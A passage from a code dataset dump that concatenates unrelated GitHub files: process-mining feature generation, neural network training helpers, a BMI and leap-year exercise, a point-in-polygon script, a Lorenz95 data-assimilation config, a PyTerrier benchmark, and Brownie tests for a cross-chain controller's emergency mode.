replay_log(self, TM, window_list, eventlog, transition_matrix, start_time, complete_time, measure='processing', agg='avg'):\n replay_list = list()\n for dt1, dt2 in window_list:\n #only complete timestamp\n if start_time == 'default':\n filtered_log = filter_log_by_timestamp(eventlog, start_time=start_time, complete_time=complete_time, dt1=dt1, dt2=dt2)\n else:\n filtered_log = filter_log_by_timestamp_with_start(eventlog, start_time=start_time, complete_time=complete_time, dt1=dt1, dt2=dt2, measure=measure, agg=agg)\n perf_measure = '{}_{}'.format(agg, measure)\n annotated_ts = TM.clear_annotation(transition_matrix, perf_measure)\n\n #measurements\n if measure == 'processing':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='processing')\n elif measure == 'waiting':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='waiting')\n elif measure == 'sojourn':\n annotated_ts = TM.annotate_transition_matrix(filtered_log, 4, transition_matrix, start_time=start_time, complete_time=complete_time, value='sojourn')\n\n #aggregation\n if agg == 'avg':\n annotated_ts = compute_avg_time(annotated_ts, measure)\n elif agg == 'length':\n timestamp_vals = filtered_log.get_col_values('TIMESTAMP')\n log_start_at = min(timestamp_vals)\n log_end_at = max(timestamp_vals)\n log_range = log_end_at-log_start_at\n annotated_ts = compute_avg_queue_len(annotated_ts, measure, log_range)\n elif agg == 'count':\n annotated_ts = compute_cnt(annotated_ts, measure)\n elif agg == 'std':\n annotated_ts = compute_std_time(annotated_ts, measure)\n 
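            #collect one fully annotated transition system per sliding window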
replay_list.append(annotated_ts)\n return replay_list\n\n\n def produce_2d_feature_vector(self, ts_list, perf_measure, trans_to_int, int_to_trans):\n #(num_trans, num_window)\n feature_vector = list()\n num_acrs = 0\n i = 0\n num_acrs += len(trans_to_int)\n #print(\"num arcs: {}\".format(num_acrs))\n for ts in ts_list:\n t_row = [0 for x in range(num_acrs)]\n for ai in ts:\n for aj in ts[ai]['outgoings']:\n trans_name = \"/\".join((ai,aj))\n if trans_name in trans_to_int:\n val = ts[ai]['outgoings'][aj][perf_measure]\n #print(\"{}->{}: {}\".format(ai,aj,val))\n idx = trans_to_int[trans_name]\n t_row[idx] = val\n else:\n continue\n t_row = np.array(t_row)\n t_row = np.hstack(t_row)\n feature_vector.append(t_row)\n feature_vector=np.array(feature_vector)\n print(feature_vector)\n return feature_vector\n\n def produce_2d_state_feature_vector(self, ts_list, perf_measure, states_to_int, int_to_states):\n #(num_trans, num_window)\n\n feature_vector = list()\n num_nodes = len(states_to_int)\n for ts in ts_list:\n t_row = [0 for x in range(num_nodes)]\n for ai in ts:\n if ai in states_to_int:\n val = ts[ai][perf_measure]\n idx = states_to_int[ai]\n t_row[idx] = val\n else:\n continue\n t_row = np.array(t_row)\n t_row = np.hstack(t_row)\n feature_vector.append(t_row)\n feature_vector=np.array(feature_vector)\n return feature_vector\n\n\n\n def produce_3d_samples(self, fv, input_size=1, output_size=1):\n #generate (samples, num_trans, num_window)\n X_train = list()\n y_train = list()\n for i in range(0,fv.shape[0]-input_size-output_size+1,1):\n X = fv[i:i+input_size,:]\n y = fv[i+input_size:i+input_size+output_size,:]\n X_train.append(X)\n y_train.append(y)\n X_train=np.array(X_train)\n y_train=np.array(y_train)\n return X_train, y_train\n\n def produce_3d_feature_vector(self, ts_list, perf_measure, states_to_int, int_to_states):\n #(num_window, num_nodes, num_nodes)\n feature_vector = list()\n\n all_nodes = list(states_to_int.keys())\n\n #print(\"num arcs: {}\".format(num_acrs))\n list_of_trans_mat = list()\n for ts in ts_list:\n list_of_lists = list()\n for ai in all_nodes:\n if ai not in ts:\n val_list = [0] * len(all_nodes)\n continue\n val_list = list()\n for aj in all_nodes:\n if aj in ts[ai]['outgoings'].keys():\n val_list.append(ts[ai]['outgoings'][aj][perf_measure])\n else:\n val_list.append(0)\n list_of_lists.append(val_list)\n list_of_trans_mat.append(list_of_lists)\n array_of_trans_mat = np.array(list_of_trans_mat)\n return array_of_trans_mat\n\n\n def produce_4d_samples(self, fv, input_size=3, output_size=1):\n #generate (samples, num_nodes, num_nodes, num_window)\n X_train = list()\n y_train = list()\n for i in range(0,fv.shape[0]-input_size-output_size+1,1):\n X = fv[i:i+input_size,:,:]\n y = fv[i+input_size:i+input_size+output_size,:,:]\n X_train.append(X)\n y_train.append(y)\n X_train=np.array(X_train)\n y_train=np.array(y_train)\n return X_train, y_train\n","repo_name":"gyunamister/performance_prediction","sub_path":"preprocess/feature_generator.py","file_name":"feature_generator.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42449920726","text":"\"\"\"\n Functions that are used to train and test our framework.\n Some of them have a version with minibatches and other without them.\n\"\"\"\nfrom torch import empty as empty\nfrom torch import set_grad_enabled\nfrom torch import int64, float32 # necessary to generate data\nfrom math import sqrt, 
pi\n\n\nset_grad_enabled(False)\n\n\n################################################################################\n# Generating training and testing set of nb 2D points. They are sampled \n# uniformly in (0,1), and the labels are marked with 1 if the points are inside\n# the disk centered at (0.5, 0.5) of radius 1/sqrt(2*pi). If not, are marked as 0\n################################################################################\ndef generate_disc_set(nb): \n\n input = empty(nb,2, dtype = float32).uniform_(0.0,1.0)\n input_norm = (input - 0.5).pow(2).sum(dim=1).sqrt()\n output = empty(nb, dtype = int64)\n output[:] = 0\n output[input_norm < 1/sqrt(2*pi)] = 1\n \n return input, output\n\n\n\n################################################################################\n# This function computes the number of missclassified values. \n# Compatible with our framework methods. It doesn't work when using minibatches.\n################################################################################\ndef compute_nb_errors(model, input, target):\n\n nb_data_errors = 0\n\n predicted_target = empty(target.shape)\n\n for i, element in enumerate(input):\n output = model.forward(element)\n if (output[0] > output[1]):\n predicted_classes = 0\n else:\n predicted_classes = 1\n\n if target[i,predicted_classes] == 0:\n nb_data_errors = nb_data_errors + 1\n \n predicted_target[i] = predicted_classes\n\n return nb_data_errors, predicted_target\n\n\n################################################################################\n# This function computes the number of missclassified values. \n# Compatible with our framework methods. It works with minibatches.\n################################################################################\ndef compute_nb_errors_minibatch(model, input, target, minibatch_size):\n nb_errors = 0\n\n predicted_target = empty(target.shape[0])\n\n for b in range(0, input.size(0), minibatch_size):\n output = model.forward(input.narrow(0, b, minibatch_size))\n _, predicted_classes = output.max(1)\n for k in range(minibatch_size):\n if target[b + k, predicted_classes[k]] <= 0:\n nb_errors = nb_errors + 1\n \n predicted_target[b:b+minibatch_size] = predicted_classes\n\n return nb_errors, predicted_target\n\n\n\n################################################################################\n# Training function compatible with our framework. \n# It works without minibatches, applying each data point\n# independently to the model. \n# Logs the error every 20 epochs and return a tensor with all the losses.\n################################################################################\ndef train(mod, criterion, train_input, train_target_hot_label, nb_epochs, eta):\n\n nb_train_samples = train_input.shape[0]\n \n losses = empty(nb_epochs)\n\n for e in range(nb_epochs):\n\n loss_sum = 0\n\n for i in range(0,nb_train_samples):\n \n pred = mod.forward(train_input[i])\n loss = criterion.forward(pred,train_target_hot_label[i])\n \n loss_sum += loss.item()\n\n grad_loss = criterion.backward(pred,train_target_hot_label[i])\n mod.backward(grad_loss)\n for p in mod.param():\n p.p -= eta * p.gradient\n\n if e % 20 == 0:\n print(\"Loss at epoch \", e , \": \" , loss_sum)\n\n losses[e] = loss_sum\n \n return losses\n\n\n\n################################################################################\n# Training function compatible with our framework. 
\n# It works dividing the training data in minibatches, therefore improving the performance.\n# Logs the error every 20 epochs and return a tensor with all the losses.\n################################################################################\ndef train_minibatch(mod, criterion, train_input, train_target_hot_label, nb_epochs, eta, minibatch_size):\n    nb_train_samples = train_input.shape[0]\n\n    losses = empty(nb_epochs)\n\n    for e in range(nb_epochs):\n\n        loss_sum = 0\n\n        for b in range(0,nb_train_samples, minibatch_size):\n            \n            pred = mod.forward(train_input.narrow(0, b, minibatch_size))\n            loss = criterion.forward(pred,train_target_hot_label.narrow(0, b, minibatch_size))\n            \n            loss_sum += loss.item()\n\n            grad_loss = criterion.backward(pred,train_target_hot_label.narrow(0, b, minibatch_size))\n            mod.backward(grad_loss)\n            for p in mod.param():\n                p.p -= eta * p.gradient\n\n        if e % 20 == 0:\n            print(\"Loss at epoch \", e , \": \" , loss_sum)\n\n        losses[e] = loss_sum\n    \n    return losses","repo_name":"RaphaelUebersax/Deep-Learning-course","sub_path":"Projects/Proj2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34893918038","text":"#healthy status check\nheight=float(input(\"enter your height in m:\"))\nweight=float(input(\"enter your weight in kg:\"))\nBMI=round(weight/(height*height))\nif BMI<18.5:\n    print(f\"your BMI is:{BMI},you are underweight\")\nelif BMI<25:\n    print(f\"your BMI is:{BMI},you have a normal weight\")\nelif BMI<30:\n    print(f\"your BMI is:{BMI},you are overweight\")\nelif BMI<35:\n    print(f\"your BMI is:{BMI},you are obese\")\nelse:\n    print(f\"your BMI is:{BMI},you are clinically obese\")\n#year check project\n\nyear=int(input(\"Which year do you want to check?\"))\nif year%4==0:\n    if year%100==0:\n        if year%400==0:\n            print(\"it is a leap year\")\n        else:\n            print(\"it is not a leap year\")\n    else:\n        print(\"it is a leap year\") \nelse:\n    print(\"it is not a leap year\")\n\n\n\n\n\n\n","repo_name":"Karen-yuan/100_days_of_Python","sub_path":"Day3/multiple_ex.py","file_name":"multiple_ex.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2553548875","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef read_file(path, read_header=False):\n    with open(path, \"r+\") as f:\n        rows = f.readlines()\n    if not read_header:\n        rows = rows[1:]\n    cols = []\n    for row in rows:\n        col = str.split(row)\n        if len(col) == 0:\n            continue\n        if len(col) == 1:\n            cols.append([int(col[0])])\n        else:\n            cols.append([int(c) for c in col])\n    return cols\n\n\ndef write_file(path, header, data):\n    with open(path, \"w+\") as f:\n        if header is not None:\n            row = \"\"\n            for h in header:\n                row += \"\\t\" + h\n            row = row[1:] + \"\\n\"\n            f.write(row)\n        for cols in data:\n            row = \"\"\n            for col in cols:\n                row += \"\\t\" + str(col)\n            row = row[1:] + \"\\n\"\n            f.write(row)\n\n\ndef show(input_polygon_path, input_points_path):\n    coords = np.array(read_file(input_polygon_path, read_header=True))\n    coords = coords.transpose()\n    x = coords[0]\n    x = np.append(x, x[0])\n    y = coords[1]\n    y = np.append(y, y[0])\n    plt.plot(x, y, color='r')\n    plt.scatter(x, y, color='b')\n\n    coords = np.array(read_file(input_points_path, read_header=True))\n    coords = coords.transpose()\n    x = coords[0]\n    y = coords[1]\n    plt.scatter(x, y, color='g')\n    plt.show()\n\n\n# 
detect a point (old version using numpy)\n# def is_point_in_polygon(polygon_coordinate, point):\n# numof_lines_in_polygon = polygon_coordinate.shape[0]\n# x, y = point\n# flag_left = 0\n# flag_right = 0\n# for i in range(numof_lines_in_polygon):\n# point1_in_polygon = polygon_coordinate[i]\n# if i == numof_lines_in_polygon - 1:\n# point2_in_polygon = polygon_coordinate[0]\n# else:\n# point2_in_polygon = polygon_coordinate[i + 1]\n# # point is one of the vertex\n# if point is point1_in_polygon or point is point2_in_polygon:\n# return True\n# # point located between two endpoints of polygon's edge\n# elif point1_in_polygon[1] > y > point2_in_polygon[1] or point2_in_polygon[1] > y > point1_in_polygon[1]:\n# # intersection_point is edge intersect with a horizontal line which through input point\n# if point1_in_polygon[0] == point2_in_polygon[0]:\n# intersection_point_x = point1_in_polygon[0]\n# else:\n# # y = kx + b...\n# intersection_point_x = point2_in_polygon[0] + (y - point2_in_polygon[1]) / (\n# (point2_in_polygon[1] - point1_in_polygon[1]) / (\n# point2_in_polygon[0] - point1_in_polygon[0]))\n# if intersection_point_x == x:\n# # point is a intersection_point\n# return True\n# if intersection_point_x < x:\n# flag_left += 1\n# else:\n# flag_right += 1\n# # point and endpoint are horizontal\n# else:\n# if point2_in_polygon[1] == y:\n# pass\n# elif point1_in_polygon[1] == y:\n# # get first endpoint of last edge\n# last_point1_in_polygon = polygon_coordinate[i - 1]\n# if (point2_in_polygon[1] < y < last_point1_in_polygon[1]) or (\n# last_point1_in_polygon[1] < y < point2_in_polygon[1]):\n# if point1_in_polygon[0] < x:\n# flag_left += 1\n# else:\n# flag_right += 1\n# else:\n# pass\n#\n# if flag_right % 2 == 0:\n# return False\n# else:\n# return True\n\n\n# detect a point do not use numpy\ndef is_point_in_polygon_no_numpy(polygon_coordinate_x, polygon_coordinate_y, point):\n numof_lines_in_polygon = len(polygon_coordinate_x)\n x, y = point\n flag_left = 0\n flag_right = 0\n for i in range(numof_lines_in_polygon):\n point1_in_polygon = [polygon_coordinate_x[i], polygon_coordinate_y[i]]\n if i == numof_lines_in_polygon - 1:\n point2_in_polygon = [polygon_coordinate_x[0], polygon_coordinate_y[0]]\n else:\n point2_in_polygon = [polygon_coordinate_x[i + 1], polygon_coordinate_y[i + 1]]\n # point is one of the vertex\n if point is point1_in_polygon or point is point2_in_polygon:\n return True\n # point located between two endpoints of polygon's edge\n elif point1_in_polygon[1] > y > point2_in_polygon[1] or point2_in_polygon[1] > y > point1_in_polygon[1]:\n # edge is vertical\n if point1_in_polygon[0] == point2_in_polygon[0]:\n intersection_point_x = point1_in_polygon[0]\n else:\n # y = kx + b...\n intersection_point_x = point2_in_polygon[0] + (y - point2_in_polygon[1]) / (\n (point2_in_polygon[1] - point1_in_polygon[1]) / (\n point2_in_polygon[0] - point1_in_polygon[0]))\n if intersection_point_x == x:\n # point is a intersection_point\n return True\n if intersection_point_x < x:\n flag_left += 1\n else:\n flag_right += 1\n # point and endpoint are horizontal\n else:\n if point2_in_polygon[1] == y:\n pass\n elif point1_in_polygon[1] == y:\n # get first endpoint of last edge\n last_point1_in_polygon = [polygon_coordinate_x[i - 1], polygon_coordinate_y[i - 1]]\n if (point2_in_polygon[1] < y < last_point1_in_polygon[1]) or (\n last_point1_in_polygon[1] < y < point2_in_polygon[1]):\n if point1_in_polygon[0] < x:\n flag_left += 1\n else:\n flag_right += 1\n else:\n pass\n\n if flag_right % 2 == 0:\n 
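# ray casting parity: an even number of edge crossings on one side means the point lies outside the polygon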
return False\n else:\n return True\n\n\n# detect points (old version using numpy)\n# def is_points_in_polygon(polygon_coordinate, points_coordinate):\n# numof_points = points_coordinate.shape[0]\n# result = [\"\" for _ in range(numof_points)]\n# x_max, y_max = np.max(polygon_coordinate, axis=0)\n# x_min, y_min = np.min(polygon_coordinate, axis=0)\n#\n# for i in range(numof_points):\n# x, y = points_coordinate[i]\n# # detect border\n# if x < x_min or x > x_max or y < y_min or y > y_max:\n# result[i] = 'outside'\n# else:\n# if is_point_in_polygon(polygon_coordinate, points_coordinate[i]):\n# result[i] = 'inside'\n# else:\n# result[i] = 'outside'\n# return result\n\n\n# detect points do not use numpy\ndef is_points_in_polygon_no_numpy(polygon_coordinate_list, points_coordinate_list):\n numof_points = len(points_coordinate_list)\n result = [\"\" for _ in range(numof_points)]\n polygon_coordinate_x = []\n polygon_coordinate_y = []\n points_coordinate_x = []\n points_coordinate_y = []\n for coord in polygon_coordinate_list:\n polygon_coordinate_x.append(coord[0])\n polygon_coordinate_y.append(coord[1])\n for coord in points_coordinate_list:\n points_coordinate_x.append(coord[0])\n points_coordinate_y.append(coord[1])\n x_max, y_max = max(polygon_coordinate_x), max(polygon_coordinate_y)\n x_min, y_min = min(polygon_coordinate_x), min(polygon_coordinate_y)\n\n for i in range(numof_points):\n x, y = points_coordinate_x[i], points_coordinate_y[i],\n # detect border\n if x < x_min or x > x_max or y < y_min or y > y_max:\n result[i] = 'outside'\n else:\n if is_point_in_polygon_no_numpy(polygon_coordinate_x, polygon_coordinate_y,\n [points_coordinate_x[i], points_coordinate_y[i]]):\n result[i] = 'inside'\n else:\n result[i] = 'outside'\n return result\n\n\ndef main():\n polygon_path = \"input_data/input_question_6_polygon\"\n points_path = \"input_data/input_question_6_points\"\n output_path = \"./output_question_6\"\n # show(polygon_path, points_path)\n polygon_coordinate_list = read_file(polygon_path, read_header=True)\n # polygon_coordinate = np.array(polygon_coordinate_list)\n points_coordinate_list = read_file(points_path, read_header=True)\n # points_coordinate = np.array(points_coordinate_list)\n\n result = is_points_in_polygon_no_numpy(polygon_coordinate_list, points_coordinate_list)\n # result = is_points_in_polygon(polygon_coordinate, points_coordinate)\n\n print(polygon_coordinate_list)\n print(points_coordinate_list)\n print(result)\n\n with open(output_path, \"w+\") as f:\n for i in range(len(result)):\n data = \"\"\n for j in points_coordinate_list[i]:\n data += str(j) + \"\\t\"\n data += result[i] + \"\\n\"\n f.write(data)\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JiaaZe/AY20_MBDS_answers","sub_path":"Question 6/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":9116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7606528449","text":"# From Fig. 
1 of Bocquet 2010 \"Beyond Gaussian Statistical Modeling\n# in Geophysical Data Assimilation\".\nfrom common import *\n\nfrom mods.Lorenz95 import core\n\nt = Chronology(0.05,dkObs=1,T=4**3,BurnIn=20)\n\nNx = 10\nDyn = {\n 'M' : Nx,\n 'model': core.step,\n 'noise': 0\n }\n\nX0 = GaussRV(M=Nx, C=0.001)\n\njj = arange(0,Nx,2)\nObs = partial_direct_Obs(Nx,jj)\nObs['noise'] = 1.5\n \nHMM = HiddenMarkovModel(Dyn,Obs,t,X0)\n\n####################\n# Suggested tuning\n####################\n# Why are these benchmarks superior to those in the article?\n# We use, in the EnKF,\n# - inflation instead of additive noise ?\n# - Sqrt instead of perturbed obs\n# - random orthogonal rotations.\n# The particle filters are also probably better tuned:\n# - jitter covariance proportional to ensemble (weighted) cov\n# - no jitter on unique particles after resampling\n#\n# For a better \"picture\" of the relative performances,\n# see benchmarks in presentation from SIAM_SEAS.\n# Note: They are slightly unrealiable (short runs).\n\n# Expected RMSE_a:\n# cfgs += EnKF_N(N=8,rot=True,xN=1.3) # 0.31\n\n# cfgs += PartFilt(N=50 ,NER=0.3 ,reg=1.7) # 1.0\n# cfgs += PartFilt(N=100,NER=0.2 ,reg=1.3) # 0.36\n# cfgs += PartFilt(N=800,NER=0.2 ,reg=0.8) # 0.25\n\n# cfgs += OptPF( N=50 ,NER=0.25,reg=1.4,Qs=0.4) # 0.61\n# cfgs += OptPF( N=100,NER=0.2 ,reg=1.0,Qs=0.3) # 0.37\n# cfgs += OptPF( N=800,NER=0.2 ,reg=0.6,Qs=0.1) # 0.25\n\n# cfgs += PFa( N=50 ,alpha=0.4,NER=0.5,reg=1.0) # 0.45\n# cfgs += PFa( N=100,alpha=0.3,NER=0.4,reg=1.0) # 0.38\n\n# cfgs += PFxN (N=30, NER=0.4, Qs=1.0,xN=1000) # 0.48\n# cfgs += PFxN (N=50, NER=0.3, Qs=1.1,xN=100 ) # 0.43\n# cfgs += PFxN (N=100,NER=0.2, Qs=1.0,xN=100 ) # 0.32\n# cfgs += PFxN (N=400,NER=0.2, Qs=0.8,xN=100 ) # 0.27\n# cfgs += PFxN (N=800,NER=0.2, Qs=0.6,xN=100 ) # 0.25\n\n# cfgs += PFxN_EnKF(N=25 ,NER=0.4 ,Qs=1.5,xN=100) # 0.49\n# cfgs += PFxN_EnKF(N=50 ,NER=0.25,Qs=1.5,xN=100) # 0.36\n# cfgs += PFxN_EnKF(N=100,NER=0.20,Qs=1.0,xN=100) # 0.32\n# cfgs += PFxN_EnKF(N=300,NER=0.10,Qs=1.0,xN=100) # 0.28\n","repo_name":"franktoffel/dapper","sub_path":"mods/Lorenz95/boc10.py","file_name":"boc10.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16259992141","text":"import pandas as pd\nimport pyterrier as pt\npt.init()\n\n# download tripjudge here: https://github.com/sophiaalthammer/tripjudge\nqrels = pd.read_csv('./tripjudge/data/qrels_2class.txt', sep=' ', names=['qid', 'Q0', 'docno', 'label'])\nqrels['qid'] = qrels['qid'].apply(str)\nqrels['docno'] = qrels['docno'].apply(str)\n\ndataset = pt.get_dataset('irds:tripclick/test/head')\nindex = pt.IndexFactory.of('./indices/tripclick/data.properties')\n\nDFRee = pt.BatchRetrieve(index, wmodel=\"DFRee\") >> pt.pipelines.PerQueryMaxMinScoreTransformer()\nDl = pt.BatchRetrieve(index, wmodel=\"Dl\") >> pt.pipelines.PerQueryMaxMinScoreTransformer()\n\nalphas = [.4, .45, .5, .55, .6, .65, .7, .75, .8, .85, .9, .95, 1]\n\nsystems = [\n (1 - alpha)* DFRee + alpha * Dl for alpha in alphas\n]\n\nexp_res = pt.Experiment(\n systems,\n dataset.get_topics(),\n qrels,\n eval_metrics=['P_20', 'ndcg_cut_20', 'map'],\n names = [str(alpha) for alpha in alphas]\n)\n\nexp_res.to_csv('./experimental_results/benchmark.irm.tripjudge.2.grade.csv', index=False)\nprint(exp_res.to_markdown(tablefmt=\"grid\", 
floatfmt=\"0.4f\"))\n\n","repo_name":"irgroup/validating-synthetic-usage-data","sub_path":"src/benchmark_irm.py","file_name":"benchmark_irm.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15156131811","text":"import brownie\nimport pytest\n\nfrom brownie import (\n # Brownie helpers\n accounts,\n web3,\n reverts,\n Wei,\n chain,\n Contract,\n)\n\nfrom eth_abi import encode_abi, encode_single\n\ndef test_basic(setup_protocol):\n \"\"\"\n basic check to ensure the correctness of the setup\n \"\"\"\n proxy_admin = setup_protocol[\"proxy_admin\"]\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cross_chain_controller_emergency_mode_logic = setup_protocol[\"cross_chain_controller_emergency_mode_logic\"]\n\n info = proxy_admin.getProxyImplementation(cross_chain_controller_emergency_mode)\n\n assert info == cross_chain_controller_emergency_mode_logic.address\n\n\ndef test_constructor(setup_protocol):\n \"\"\"\n checking the variable set in the constructor in the CrossChainController proxy\n \"\"\"\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == cl_emergency_oracle\n\n\ndef test_initialize(\n setup_protocol, owner, guardian, MainnetChainIds, bridge_adapter, carol\n):\n \"\"\"\n Testing the initialization\n \"\"\"\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n destination_chain_bridge_adapter = setup_protocol[\"destination_chain_bridge_adapter\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n # Validation\n assert cross_chain_controller_emergency_mode.guardian() == guardian\n assert cross_chain_controller_emergency_mode.owner() == owner\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == cl_emergency_oracle\n adapters = cross_chain_controller_emergency_mode.getReceiverBridgeAdaptersByChain(chain.id)\n assert adapters[0] == bridge_adapter\n bridge_config = cross_chain_controller_emergency_mode.getForwarderBridgeAdaptersByChain(MainnetChainIds.POLYGON)[0]\n assert bridge_config[0] == destination_chain_bridge_adapter # destinationBridgeAdapter\n assert bridge_config[1] == current_chain_bridge_adapter # currentChainBridgeAdapter\n assert cross_chain_controller_emergency_mode.isSenderApproved(carol) is True\n\n\n###########################################\n##### Tests for EmergencyConsumer #######\n###########################################\n\ndef test_update_cl_emergency_oracle(setup_protocol, owner, alice):\n \"\"\"\n Testing `updateCLEmergencyOracle()`\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = alice # just for testing\n tx = cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": owner} )\n\n # Validation\n assert tx.events[\"CLEmergencyOracleUpdated\"][\"chainlinkEmergencyOracle\"] == chainlink_emergency_oracle\n assert cross_chain_controller_emergency_mode.getChainlinkEmergencyOracle() == chainlink_emergency_oracle\n\n\ndef test_update_cl_emergency_oracle_not_owner(setup_protocol, alice):\n \"\"\"\n Testing 
`updateCLEmergencyOracle()`, caller not the owner\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = alice # just for testing\n\n with reverts(\"Ownable: caller is not the owner\"):\n cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": alice} )\n\n\ndef test_update_cl_emergency_oracle_zero_address(setup_protocol, owner, constants):\n \"\"\"\n Testing `updateCLEmergencyOracle()` when the oracle = address(0)\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n chainlink_emergency_oracle = constants.ZERO_ADDRESS\n with reverts(\"28\"): #INVALID_EMERGENCY_ORACLE\n cross_chain_controller_emergency_mode.updateCLEmergencyOracle(chainlink_emergency_oracle, {\"from\": owner} )\n\n\n\n############################################################\n#### Tests for CrossChainControllerWithEmergencyMode ######\n############################################################\n\ndef test_solve_emergency(setup_protocol, guardian, alice, carol, MainnetChainIds, bridge_adapter, Empty):\n \"\"\"\n Testing `solveEmergency()`\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n cl_emergency_oracle = setup_protocol[\"cl_emergency_oracle\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n\n # newConformations\n required_confirmation = 2\n chain_id = MainnetChainIds.POLYGON\n new_confirmation_1 = [chain_id, required_confirmation]\n\n required_confirmation = 1\n chain_id = MainnetChainIds.AVALANCHE\n new_confirmation_2 = [chain_id, required_confirmation]\n\n new_confirmations = [new_confirmation_1, new_confirmation_2]\n\n # ValidityTimestampInput\n chain_id = MainnetChainIds.POLYGON\n validity_timestamp = 1689000000\n validity_timestamp_input = [[chain_id, validity_timestamp]]\n\n # receiverBridgeAdaptersToDisallow\n\n receiver_adapter_to_disallow = [[bridge_adapter.address, [chain.id]]]\n\n # receiverBridgeAdaptersToAllow\n receiver_adapter_to_allow_1 = [alice.address, [MainnetChainIds.POLYGON, MainnetChainIds.AVALANCHE]]\n\n receiver_adapter_to_allow_2 = [carol.address, [MainnetChainIds.POLYGON]]\n\n receiver_adapter_to_allow = [receiver_adapter_to_allow_1, receiver_adapter_to_allow_2]\n\n #sendersToRemove\n senders_to_remove = []\n\n #senderToApprove\n senders_to_approve = [alice.address]\n\n #forwarderBridgeAdaptersToDisable\n bridge_adapter_to_disable = [[current_chain_bridge_adapter.address, [MainnetChainIds.POLYGON]]]\n\n #forwarderBridgeAdaptersToEnable\n current_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n destination_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n\n bridge_adapter_to_enable = [[current_chain_bridge_adapter, destination_chain_bridge_adapter, MainnetChainIds.AVALANCHE]]\n\n # set answer a value != 0 so that the modifier `onlyInEmergency` do not revert\n answer = 1\n cl_emergency_oracle.setAnswer(answer, {\"from\": alice})\n\n\n # call solveEmergency()\n tx = cross_chain_controller_emergency_mode.solveEmergency(\n new_confirmations,\n validity_timestamp_input,\n receiver_adapter_to_allow,\n receiver_adapter_to_disallow,\n senders_to_approve,\n senders_to_remove,\n bridge_adapter_to_enable,\n bridge_adapter_to_disable,\n {\"from\": guardian}\n )\n\n assert \"ReceiverBridgeAdaptersUpdated\" in tx.events\n assert \"NewInvalidation\" in tx.events\n assert \"ConfirmationsUpdated\" in 
tx.events\n assert \"SenderUpdated\" in tx.events\n assert tx.events[\"EmergencySolved\"][\"emergencyCount\"] == answer\n assert cross_chain_controller_emergency_mode.getEmergencyCount() == answer\n\n\ndef test_solve_emergency_not_in_emergency(setup_protocol, guardian, alice, carol, MainnetChainIds, bridge_adapter, Empty):\n \"\"\"\n Testing `solveEmergency()`, when the answer from CL Emergency Oracle is 0\n \"\"\"\n\n cross_chain_controller_emergency_mode = setup_protocol[\"cross_chain_controller_emergency_mode\"]\n current_chain_bridge_adapter = setup_protocol[\"current_chain_bridge_adapter\"]\n\n # newConformations\n required_confirmation = 2\n chain_id = MainnetChainIds.POLYGON\n new_confirmation_1 = [chain_id, required_confirmation]\n\n required_confirmation = 1\n chain_id = MainnetChainIds.AVALANCHE\n new_confirmation_2 = [chain_id, required_confirmation]\n\n new_confirmations = [new_confirmation_1, new_confirmation_2]\n\n # ValidityTimestampInput\n chain_id = MainnetChainIds.POLYGON\n validity_timestamp = 1689000000\n validity_timestamp_input = [[chain_id, validity_timestamp]]\n\n # receiverBridgeAdaptersToDisallow\n\n receiver_adapter_to_disallow = [[bridge_adapter.address, [chain.id]]]\n\n # receiverBridgeAdaptersToAllow\n receiver_adapter_to_allow_1 = [alice.address, [MainnetChainIds.POLYGON, MainnetChainIds.AVALANCHE]]\n\n receiver_adapter_to_allow_2 = [carol.address, [MainnetChainIds.POLYGON]]\n\n receiver_adapter_to_allow = [receiver_adapter_to_allow_1, receiver_adapter_to_allow_2]\n\n #sendersToRemove\n senders_to_remove = []\n\n #senderToApprove\n senders_to_approve = [alice.address]\n\n #forwarderBridgeAdaptersToDisable\n bridge_adapter_to_disable = [[current_chain_bridge_adapter.address, [MainnetChainIds.POLYGON]]]\n\n #forwarderBridgeAdaptersToEnable\n current_chain_bridge_adapter = Empty.deploy({\"from\": carol})\n destination_chain_bridge_adapter = 